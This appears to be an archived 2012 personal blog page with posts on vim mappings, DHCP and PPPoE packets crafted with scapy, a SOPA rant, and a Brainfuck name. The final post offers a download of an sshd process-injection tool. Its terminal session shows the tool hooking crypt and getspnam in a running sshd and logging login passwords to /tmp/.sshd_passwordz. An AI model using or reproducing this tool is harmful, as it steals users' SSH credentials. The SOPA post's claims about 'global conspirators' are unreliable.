Tuesday, January 24, 2012

Easing vim use

The following is a vim script that makes it easier to use vim for those who are familiar with graphical editors:

:map  :q!
:map <C-c> :w !xclip
:map <C-v> :r!xclip -o
:map <C-w> :wq!
:map <C-z> :u

To use the above, just save the above contents to a file (say, easyedit.vim, in the home directory ~/easyedit.vim) and include the following into the ~/.vimrc file as follows:

so ~/easyedit.vim

Then start up vim, and you can see that you can use ctrl-c, ctrl-v, ctrl-z, ctrl-w and esc buttons and see behavior as expected in a graphical editor
Posted by Suchindra Chandrahas at 1:13 AM 2 comments
Reactions: 

Monday, January 23, 2012

Making the blog better

After 1000s of accesses, I have got many inputs to improve this blog. One of them being that I must first make it good to read. I will start working on this from today onwards. Article by article, I will make them readable. I kind of like the hackish way of doing things and ended up writing comprehensive and concise information in my blog. My efforts will be more towards better readability from now onwards :)

BTW all of those who take time to visit my blog, a big thank you for visiting my blog. I hope I get more audience once I make improvements :)
Posted by Suchindra Chandrahas at 10:21 PM 0 comments
Reactions: 

Thursday, January 19, 2012

DHCP discovery using scapy

Taken from here

Putting it plain and simple:

The following script sends a network packet containing the following layers:

a. DHCP: Application layer packet, message-type=discover
b. BOOTP: chaddr is used both as a hardware address for transmission of BOOTP reply messages and as a client identifier == MAC address of the nic
c. UDP: destination port is 67
d. IP: destination IP is broadcast IP address 255.255.255.255
e. ETHERNET: destination MAC is broadcast MAC ff:ff:ff:ff:ff:ff

from scapy.all import *
import sys

conf.checkIPaddr = False

#
# Get the hardware address of nic card
#
fam,hw = get_if_raw_hwaddr(conf.iface)

def dhcp_discover(resp):
    print "Source: " +resp[Ether].src
    print "Dest: " +resp[Ether].dst

#
# What if there is no DHCP component 
# in the incoming packet (so try and except)
#
    try: 
        for opt in resp[DHCP].options:
            if opt == 'end':
                break
            elif opt == 'pad':
                break
            print "Response:" + opt
    except:
        return 0
#
# send the raw packet to network
#
    sendp(Ether(dst="ff:ff:ff:ff:ff:ff") \
    /IP(src="0.0.0.0",dst="255.255.255.255") \
    /UDP(sport=68,dport=67)/BOOTP(chaddr=hw) \
    /DHCP(options=[("message-type","discover")]),count=3)

#
# sniff on udp port 67 and 68 
# and run the function dhcp_discover on all packets sniffed
# 
sniff(filter="udp and (port 67 or 68)", \
        prn=dhcp_discover, store=1)

The following is the response from DHCP server
, when the above script is executed

# python dhcp,py
Source: 00:1c:f9:93:04:00
Dest: 00:50:56:7c:c3:4f
('message-type', 5)
('server_id', '10.112.11.12')
('lease_time', 1800)
('subnet_mask', '255.255.252.0')
('router', '10.112.75.253')
('domain', 'dhcpserver.com')
('name_server', '10.112.11.12')
Posted by Suchindra Chandrahas at 11:31 PM 0 comments
Reactions: 

PPPoE using scapy

Article taken from here (directly reproduced below):

Publication date : February 1999
RFC Author(s) : R.Wheeler, D.Simone, D. Carrel, J. Evarts, K. Lidl, L. Mamakos
Category : informational

The Point-to-point Protocol (PPP) provides a standard method for transporting multi-protocol datagrams over point-to-point links.

PPPoE has two differents stages, first one is PPP Discovery stage that contains four steps when a host discovers the MAC address of peer (Concentrator) and the PPPoE session ID.
In the fact, the Mac address and PPPoE_SESSION_ID uniquely define a ession.
The relationship between the peers is a simple client/server when a client asks server(Concentrator) for informations to establish
the session.

The Frame sent is a simple Ethernet frame where the ETHER_TYPE is set to either 0×8863 (Discovery Stage) or 0×8864 (PPP Session Stage).

Here is the Ethernet Payload for PPPoE:
[ VER:4 | TYPE:4 | CODE:8 | SESSION_ID:16 | LENGTH:16 | PAYLOAD:16 ]

Discovery Stage : Ethernet Frame have the ETHER_TYPE field set to 0×8863

1. Client to server: Initiation (PPPoE Active Discovery Initiation)
PADI:
* Host send a broadcast packet, with the code field set to 0×09
* The session id set to 0×0000

2. Server to client: Offer (PPPoE Active Disocvery Offer)
PADO:
* Access Concentrator reply to an unicast address, with code set to 0×07
* The session id set to 0×0000
* PADO packet contains AC-Name TAG, Service-Name TAG

3. Client to server: Request (PPPoE Active Discovery Request)
PADR:
* Host receive one or more PADO packet and has to choice one
* Choice is based on AC-Name or Services offred
* Host send one PADR packet to Concentrator
* Destination is the unicat Ethernet address of Cencentrator
* code field is set to 0×19 and session id is set to 0×0000

4. Server to client: Session-confirmation (PPPoE Active Discovery Session-confirmation)
PADS:
* When Access receive PADR it prepare to begin PPP session
* generate a unique session id
* reply with an unicat Ethernet address
* code field is set to 0×65
* contains exactly one TAG of TAG_TYPE Service-Name

5. Either end to other end: Termination (PADT)
* packet sent bu host or Access Concentrator
* session is established
* Destination address is unicast
* session is the SESSION_ID generated
* code field is set to 0xa7

Examples Using scapy:
1. PADI:
sendp(Ether(type=0×8863,src=”00:60:4c:72:e7:69″,dst=”ff:ff:ff:ff:ff:ff”)/PPPoED(code=0×09,sessionid=0×0000),iface=”nas0″)

PADO:
2. sendp(Ether(type=0×8863,src=”00:bf:12:fa:90:fd”, dst=”00:60:4c:72:e7:69″)/PPPoED(code=0×07,sessionid=0×0000),iface=”nas0″)
Posted by Suchindra Chandrahas at 11:14 PM 0 comments
Reactions: 

Tuesday, January 17, 2012

SOPA and PIPA

All that had to be known about the conspiratorial nature of the events happening nowadays should have been known by almost all people by now. Except for remotely existing communities of people or tribes (who live without the support of the global conspirators, and don't really care about them), all others in civilised societies should have known enough through internet by now. For all those in those societies, that still need to be educated, it will require something more than just internet to do educate them. So suppressing internet freedom, though a really bad step, doesn't really create much of a problem.

For all the honest efforts put by enlightened people around the world to explain the nature of what is happening around us, A BIG THANK YOU

For all those who have been sitting at the top, making such legislation, a sincere advice: Have some common sense and don't suppress internet freedom; Remember, today you are powerful people and nothing is permanent except GOD
Posted by Suchindra Chandrahas at 11:24 PM 0 comments
Reactions: 

Just wrote my name in BF programming language 

++++++++++[>++++++++>+++++++++++>+++++++++>++++++++++>++++++++++>+++++++++++>++++++++++>+++++++++++>+++++++++>+++>++++++>++++++++++>+++++++++>+++++++++++>++++++++++>+++++++++++>+++++++++>++++++++++>+++++++++>+++++++++++<<<<<<<<<<<<<<<<<<<<-]>+++.>+++++++.>+++++++++.>++++.>+++++.>.>.>++++.>+++++++.>++.>+++++++.>++++.>+++++++.>.>.>++++.>+++++++.>++++.>+++++++.>+++++.>+++++++.>.>.>++++.>+++++++.>+++++++.>++++.>+++++++.
Posted by Suchindra Chandrahas at 10:57 PM 0 comments
Reactions: 

Friday, January 13, 2012

SSH F***er (can't do anything, this is the name given by author)

Here is a utility to decrypt ssh passwords at runtime:

Here is the gz

And below is an example:

root@:/tmp> tar zxvf sshf.tgz
sshf/
sshf/sshf.c
sshf/evilsshd.c
sshf/Makefile.in
sshf/config.h.in
sshf/configure
root@:/tmp> cd sshf
root@:/tmp/sshf> ./configure ; make
checking for gcc... gcc
checking for C compiler default output... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for executable suffix...
checking for object suffix... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for pam_start in -lpam... yes
checking for MD5_Update in -lcrypto... yes
configure: creating ./config.status
config.status: creating Makefile
config.status: creating config.h
gcc -w -fPIC -shared -o evilsshd.so evilsshd.c -lcrypt -lcrypto -lpam  
-DHAVE_CONFIG_H
gcc -w -o sshf sshf.c
root@:/tmp/sshf> ps auwx | grep sshd
root      9597  0.0  0.3  2840 1312 ?        S    03:04   0:00 sshd
root@:/tmp/sshf>
root@:/tmp/sshf> ./sshf 9597 /tmp/sshf/evilsshd.so
attached to pid 9597
_dl_open at 0x4023014c
stopped 9597 at 0x402017ee
jam! if it jams here, try to telnet into sshd port or smthing
lib injection done!
org crypt() at 0x804b860, evil crypt at 0x40265d60
org getspnam at 0x804afa0, evil getspnam at 0x40265e0c
org strncmp() at 0x804b8f0, evil strncmp() at 0x40265a84
org MD5_Update() at 0x804bdf0, evil MD5Update at 0x40265aec
all done, now quiting...
root@:/tmp/sshf>
root@:/tmp/sshf> ssh -l luser 127.0.0.1
luser@127.0.0.1's password:
[luser@localhost:~>ls -al /tmp/.sshd_passwordz
-rw-r--r--    1 root     root          104 Jul 14 03:27 
/tmp/.sshd_passwordz
[luser@localhost:~>exit
Posted by Suchindra Chandrahas at 11:41 PM 0 comments
Reactions: 
Subscribe to: Posts (Atom)